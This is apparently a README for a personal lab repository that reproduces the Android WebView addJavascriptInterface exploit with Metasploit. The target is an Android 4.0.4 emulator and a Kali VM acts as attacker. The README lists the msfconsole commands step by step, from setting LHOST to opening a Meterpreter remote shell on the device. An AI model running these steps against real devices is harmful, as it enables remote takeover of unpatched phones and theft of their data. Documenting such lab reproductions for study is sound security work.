Based on the following resources:
https://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface
https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/
https://cyberarms.wordpress.com/2014/02/26/android-webview-exploit-tutorial-70-of-devices-vulnerable/
This repo contains:
- readme with topology and kali commands used in msfconsole
- the code from the apk in the terminal device
Note: Tested it on a 4.0.4 Android device. I also tested on 4.1 (with the same code as added here), but it seems that the exploit did not work anymore on it.
-
Topology Android 4.0.4 (in AVD) <--------> Windows 10 HOST <---Vbox vmnet 0 bridge connection----> Kali VM
-
To start the server on the kali use:
$ msfconsole
msf > use exploit/android/browser/webview_addjavascriptinterface
msf exploit(webview_addjavascriptinterface) > set LHOST $IP_OF_THE_KALI_MACHINE
msf exploit(webview_addjavascriptinterface) > set uripath $PATH_TO_USE
msf exploit(webview_addjavascriptinterface) > set port 80 (can also change it if you want)
msf exploit(webview_addjavascriptinterface) > exploit
now there should appear the message: "Server started"
-
Go now to the android device and run the app on the mobile device
-
In msfconsole there should appear now: "Meterpreter session X (starts from 1) opened"
msf exploit(webview_addjavascriptinterface) > sesion -i X (the id of the session started)
-
Access the console and enjoy !
-
Be sure to update the device to a patched version in the end!